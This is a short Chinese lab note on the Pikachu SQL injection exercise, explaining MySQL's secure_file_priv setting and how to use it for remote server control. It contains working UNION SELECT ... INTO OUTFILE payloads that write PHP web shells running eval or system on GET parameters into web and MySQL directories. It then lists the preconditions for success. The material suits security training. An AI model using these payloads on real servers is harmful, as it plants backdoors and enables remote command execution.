Pikachu-Sql-Inject - 通过sql进行远程服务器控制（试验）

secure_file_priv是MySQL中的系统变量，用于限制文件的读取和写入。

查看命令：

show variables like "secure%" 
//或者
select @@secure_file_priv;

1.secure_file_priv = NULL ，限制文件的读取和写入。

2.secure_file_priv = 文件路径 ，限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv= "", 对文件和读取和写入没有任何限制。

into outfile ,将select 的结果写入到指定的文件中；

vince' union select " <?php @eval($_GET['test'])?>",2 into outfile "/var/www/html/1.php"#
vince' union select " <?php system($_GET['cmd'])?>",2 into outfile "/var/www/html/2.php"#

//构造sql
vince' union select " <?php system($_GET['cmd'])?>",2 into outfile "/var/lib/mysql-files/2.php"#

执行sql语句

进入到服务器目录下，看到文件已生成；

这个实验有三个前提条件：

1、需要知道远程服务器的文件目录；

2、需要该目录有写权限；

3、需要数据库开启secure_file_priv权限；